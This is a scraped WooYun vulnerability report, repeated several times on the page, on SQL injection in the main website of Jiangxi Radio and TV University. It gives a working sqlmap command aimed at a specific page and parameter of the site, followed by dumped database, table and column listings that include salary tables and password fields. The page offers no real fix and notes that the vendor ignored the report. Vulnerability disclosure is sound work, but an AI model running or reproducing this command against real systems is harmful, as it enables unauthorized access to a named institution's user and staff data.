江西广播电视大学主站SQL注射 | wooyun-2015-0130978| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130978

漏洞标题：江西广播电视大学主站SQL注射

漏洞作者：冷白开。

提交时间：2015-08-04 13:22

修复时间：2015-08-09 13:24

公开时间：2015-08-09 13:24

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-04：细节已通知厂商并且等待厂商处理中
2015-08-09：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

江西广播电视大学SQL注射

详细说明：

注射命令sqlmap.py -u "http://www.jxrtvu.edu.cn/Service/GetSchoolOverview.ashx?TYPEID=" --dbs

随便脱点数据给你们看

Database: jxdd
[52 tables]
+-----------------------+
| IS_Type               |
| SYS_USERLOG           |
| Sys_Log               |
| TE_Activity           |
| TE_Ads                |
| TE_Contact            |
| TE_DTJL               |
| TE_DateDic            |
| TE_Dept               |
| TE_DeptNewsType       |
| TE_LINK               |
| TE_News               |
| TE_Role               |
| TE_RoleMenu           |
| TE_RoleUser           |
| TE_SalaryFL           |
| TE_SalaryGT           |
| TE_SalaryGZ           |
| TE_SalaryJX           |
| TE_SignUp             |
| TE_SignUpTime         |
| TE_SubsitePic         |
| TE_TK                 |
| TE_TKLB               |
| TE_User               |
| TE_UserDeptNewsType   |
| TE_VideoNews          |
| View_Contact          |
| View_DTJL             |
| View_Dept             |
| View_DeptNewsType     |
| View_ISType           |
| View_LINK             |
| View_News             |
| View_News_Pic         |
| View_Role             |
| View_RoleUser         |
| View_SalaryFL         |
| View_SalaryGT         |
| View_SalaryGZ         |
| View_SalaryJX         |
| View_Sys_log          |
| View_TE_Activity      |
| View_TE_DateDic       |
| View_TE_NewsAudit     |
| View_TE_SignUp        |
| View_TE_SubsitePic    |
| View_TK               |
| View_TKLB             |
| View_User             |
| View_UserDeptNewsType |
| View_VideoNews        |
+-----------------------+
Database: jxdd1005
[28 tables]
+---------------------+
| D99_CMD             |
| D99_Tmp             |
| IS_Type             |
| SYS_USERLOG         |
| Sys_Log             |
| TE_Activity         |
| TE_Contact          |
| TE_DTJL             |
| TE_DateDic          |
| TE_Dept             |
| TE_DeptNewsType     |
| TE_LINK             |
| TE_News             |
| TE_Role             |
| TE_RoleMenu         |
| TE_RoleUser         |
| TE_SalaryFL         |
| TE_SalaryGT         |
| TE_SalaryGZ         |
| TE_SalaryJX         |
| TE_SignUp           |
| TE_SignUpTime       |
| TE_SubsitePic       |
| TE_TK               |
| TE_TKLB             |
| TE_User             |
| TE_UserDeptNewsType |
| TE_VideoNews        |
+---------------------+
Database: jxddtest
[28 tables]
+---------------------+
| IS_Type             |
| SYS_USERLOG         |
| Sys_Log             |
| TE_Activity         |
| TE_Contact          |
| TE_DTJL             |
| TE_DateDic          |
| TE_Dept             |
| TE_DeptNewsType     |
| TE_LINK             |
| TE_News             |
| TE_Role             |
| TE_RoleMenu         |
| TE_RoleUser         |
| TE_SalaryFL         |
| TE_SalaryGT         |
| TE_SalaryGZ         |
| TE_SalaryJX         |
| TE_SignUp           |
| TE_SignUpTime       |
| TE_SubsitePic       |
| TE_TK               |
| TE_TKLB             |
| TE_User             |
| TE_UserDeptNewsType |
| TE_VideoNews        |
| person_backup       |
| test                |
+---------------------+
Database: msdb
[141 tables]
+-----------------------------------------------------------+
| MSdbms                                                    |
| MSdbms_datatype                                           |
| MSdbms_datatype_mapping                                   |
| MSdbms_map                                                |
| backupfile                                                |
| backupfilegroup                                           |
| backupmediafamily                                         |
| backupmediaset                                            |
| backupset                                                 |
| log_shipping_monitor_alert                                |
| log_shipping_monitor_error_detail                         |
| log_shipping_monitor_history_detail                       |
| log_shipping_monitor_primary                              |
| log_shipping_monitor_secondary                            |
| log_shipping_primaries                                    |
| log_shipping_primary_databases                            |
| log_shipping_primary_secondaries                          |
| log_shipping_secondaries                                  |
| log_shipping_secondary                                    |
| log_shipping_secondary_databases                          |
| logmarkhistory                                            |
| restorefile                                               |
| restorefilegroup                                          |
| restorehistory                                            |
| sqlagent_info                                             |
| suspect_pages                                             |
| sysalerts                                                 |
| syscachedcredentials                                      |
| syscategories                                             |
| syscollector_blobs_internal                               |
| syscollector_collection_items_internal                    |
| syscollector_collection_sets_internal                     |
| syscollector_collector_types_internal                     |
| syscollector_config_store_internal                        |
| syscollector_execution_log_internal                       |
| syscollector_execution_stats_internal                     |
| syscollector_tsql_query_collector                         |
| sysdac_history_internal                                   |
| sysdac_instances_internal                                 |
| sysdbmaintplan_databases                                  |
| sysdbmaintplan_history                                    |
| sysdbmaintplan_jobs                                       |
| sysdbmaintplans                                           |
| sysdownloadlist                                           |
| sysdtscategories                                          |
| sysdtspackagelog                                          |
| sysdtspackages                                            |
| sysdtssteplog                                             |
| sysdtstasklog                                             |
| sysjobactivity                                            |
| sysjobhistory                                             |
| sysjobs                                                   |
| sysjobschedules                                           |
| sysjobservers                                             |
| sysjobsteps                                               |
| sysjobstepslogs                                           |
| sysmail_account                                           |
| sysmail_attachments                                       |
| sysmail_attachments_transfer                              |
| sysmail_configuration                                     |
| sysmail_log                                               |
| sysmail_mailitems                                         |
| sysmail_principalprofile                                  |
| sysmail_profile                                           |
| sysmail_profileaccount                                    |
| sysmail_query_transfer                                    |
| sysmail_send_retries                                      |
| sysmail_server                                            |
| sysmail_servertype                                        |
| sysmaintplan_log                                          |
| sysmaintplan_logdetail                                    |
| sysmaintplan_subplans                                     |
| sysmanagement_shared_registered_servers_internal          |
| sysmanagement_shared_server_groups_internal               |
| sysnotifications                                          |
| sysoperators                                              |
| sysoriginatingservers                                     |
| syspolicy_conditions_internal                             |
| syspolicy_configuration_internal                          |
| syspolicy_execution_internal                              |
| syspolicy_facet_events                                    |
| syspolicy_management_facets                               |
| syspolicy_object_sets_internal                            |
| syspolicy_policies_internal                               |
| syspolicy_policy_categories_internal                      |
| syspolicy_policy_category_subscriptions_internal          |
| syspolicy_policy_execution_history_details_internal       |
| syspolicy_policy_execution_history_internal               |
| syspolicy_system_health_state_internal                    |
| syspolicy_target_set_levels_internal                      |
| syspolicy_target_sets_internal                            |
| sysproxies                                                |
| sysproxylogin                                             |
| sysproxysubsystem                                         |
| sysschedules                                              |
| syssessions                                               |
| sysssislog                                                |
| sysssispackagefolders                                     |
| sysssispackages                                           |
| syssubsystems                                             |
| systargetservergroupmembers                               |
| systargetservergroups                                     |
| systargetservers                                          |
| systaskids                                                |
| sysutility_mi_configuration_internal                      |
| sysutility_mi_cpu_stage_internal                          |
| sysutility_mi_dac_execution_statistics_internal           |
| sysutility_mi_session_statistics_internal                 |
| sysutility_mi_smo_objects_to_collect_internal             |
| sysutility_mi_smo_properties_to_collect_internal          |
| sysutility_mi_smo_stage_internal                          |
| sysutility_mi_volumes_stage_internal                      |
| sysutility_ucp_aggregated_dac_health_internal             |
| sysutility_ucp_aggregated_mi_health_internal              |
| sysutility_ucp_computer_cpu_health_internal               |
| sysutility_ucp_computers_stub                             |
| sysutility_ucp_configuration_internal                     |
| sysutility_ucp_cpu_utilization_stub                       |
| sysutility_ucp_dac_file_space_health_internal             |
| sysutility_ucp_dac_health_internal                        |
| sysutility_ucp_dacs_stub                                  |
| sysutility_ucp_databases_stub                             |
| sysutility_ucp_datafiles_stub                             |
| sysutility_ucp_filegroups_stub                            |
| sysutility_ucp_filegroups_with_policy_violations_internal |
| sysutility_ucp_health_policies_internal                   |
| sysutility_ucp_logfiles_stub                              |
| sysutility_ucp_managed_instances_internal                 |
| sysutility_ucp_mi_database_health_internal                |
| sysutility_ucp_mi_file_space_health_internal              |
| sysutility_ucp_mi_health_internal                         |
| sysutility_ucp_mi_volume_space_health_internal            |
| sysutility_ucp_policy_check_conditions_internal           |
| sysutility_ucp_policy_target_conditions_internal          |
| sysutility_ucp_policy_violations_internal                 |
| sysutility_ucp_processing_state_internal                  |
| sysutility_ucp_smo_servers_stub                           |
| sysutility_ucp_snapshot_partitions_internal               |
| sysutility_ucp_space_utilization_stub                     |
| sysutility_ucp_supported_object_types_internal            |
| sysutility_ucp_volumes_stub                               |
+-----------------------------------------------------------+
Database: master
[6 tables]
+-----------------------+
| MSreplication_options |
| spt_fallback_db       |
| spt_fallback_dev      |
| spt_fallback_usg      |
| spt_monitor           |
| spt_values            |
+-----------------------+
Database: ReportServer
[34 tables]
+---------------------------+
| ActiveSubscriptions       |
| Batch                     |
| CachePolicy               |
| Catalog                   |
| ChunkData                 |
| ChunkSegmentMapping       |
| ConfigurationInfo         |
| DBUpgradeHistory          |
| DataSets                  |
| DataSource                |
| Event                     |
| ExecutionLogStorage       |
| History                   |
| Keys                      |
| ModelDrill                |
| ModelItemPolicy           |
| ModelPerspective          |
| Notifications             |
| Policies                  |
| PolicyUserRole            |
| ReportSchedule            |
| Roles                     |
| RunningJobs               |
| Schedule                  |
| SecData                   |
| Segment                   |
| SegmentedChunk            |
| ServerParametersInstance  |
| ServerUpgradeHistory      |
| SnapshotData              |
| Subscriptions             |
| SubscriptionsBeingDeleted |
| UpgradeInfo               |
| Users                     |
+---------------------------+
Table: SYS_USERLOG
[90 columns]
+---------------------------------+-------------+
| Column                          | Type        |
+---------------------------------+-------------+
| adminname                       | non-numeric |
| allowviewlog                    | numeric     |
| ana_codice                      | non-numeric |
| artikel_id                      | non-numeric |
| auth_id                         | non-numeric |
| beneficiarioid                  | non-numeric |
| bloc_row                        | non-numeric |
| blog_id                         | numeric     |
| brend                           | non-numeric |
| cd                              | non-numeric |
| codigo                          | non-numeric |
| comment5                        | non-numeric |
| comune                          | non-numeric |
| content_id                      | non-numeric |
| context                         | non-numeric |
| del_flg                         | non-numeric |
| distconnectorid                 | non-numeric |
| endstateid                      | non-numeric |
| freewaylogin                    | non-numeric |
| id_breve                        | non-numeric |
| id_servico                      | non-numeric |
| idcliente                       | numeric     |
| iddiscipline                    | non-numeric |
| idevent                         | non-numeric |
| idoggetto                       | non-numeric |
| idprovenienza                   | non-numeric |
| idtipologiaservizio             | non-numeric |
| itemno                          | non-numeric |
| jcode                           | non-numeric |
| jeda                            | non-numeric |
| jfcategories                    | non-numeric |
| job_s_date                      | non-numeric |
| l_col_list                      | numeric     |
| layer                           | non-numeric |
| lbl_aom_unaccessible_shipmethod | non-numeric |
| level                           | non-numeric |
| mealid                          | non-numeric |
| meetingid                       | non-numeric |
| mod_freeway_products            | non-numeric |
| modify_date                     | non-numeric |
| myname                          | non-numeric |
| mypassword                      | non-numeric |
| newnotices                      | non-numeric |
| orecchini                       | numeric     |
| ostdate                         | non-numeric |
| parent_id                       | non-numeric |
| passe                           | non-numeric |
| permission                      | numeric     |
| pfs_id                          | numeric     |
| prc_sconto4                     | non-numeric |
| prenom                          | numeric     |
| price01                         | non-numeric |
| progetto                        | non-numeric |
| provincial                      | non-numeric |
| schedaid                        | non-numeric |
| secid                           | non-numeric |
| serverid                        | non-numeric |
| sessionid                       | non-numeric |
| settingsid                      | non-numeric |
| sot_utente_e                    | non-numeric |
| st_id                           | non-numeric |
| statechangeid                   | non-numeric |
| store2                          | non-numeric |
| store3                          | non-numeric |
| student_number                  | non-numeric |
| sub_image1                      | non-numeric |
| sub_large_image4                | non-numeric |
| temppass                        | non-numeric |
| ten                             | non-numeric |
| term_id                         | non-numeric |
| top                             | non-numeric |
| uname                           | non-numeric |
| uno                             | non-numeric |
| user_ip                         | non-numeric |
| user_level                      | non-numeric |
| user_nm                         | non-numeric |
| user_pwd                        | non-numeric |
| user_uname                      | non-numeric |
| user_usernm                     | non-numeric |
| user_usernun                    | non-numeric |
| usrn                            | non-numeric |
| usrpass                         | non-numeric |
| ustawienie                      | non-numeric |
| vm_manufacturer                 | non-numeric |
| vm_manufacturer_category        | non-numeric |
| vot_proposta_e                  | non-numeric |
| weblinks                        | non-numeric |
| xadvogado                       | non-numeric |
| xmetodo_atualizacao             | non-numeric |
| yonghu                          | non-numeric |
+---------------------------------+-------------+

不继续了太晚了，睡觉去喽

漏洞证明：

综上

修复方案：

你们懂

版权声明：转载请注明来源冷白开。@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-08-09 13:24

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130978

漏洞标题：江西广播电视大学主站SQL注射

相关厂商：江西广播电视大学

漏洞作者：冷白开。

提交时间：2015-08-04 13:22

修复时间：2015-08-09 13:24

公开时间：2015-08-09 13:24

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源冷白开。@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130978

漏洞标题：江西广播电视大学主站SQL注射

相关厂商：江西广播电视大学

漏洞作者： 冷白开。

提交时间：2015-08-04 13:22

修复时间：2015-08-09 13:24

公开时间：2015-08-09 13:24

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0130978"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 冷白开。@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：冷白开。

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源冷白开。@乌云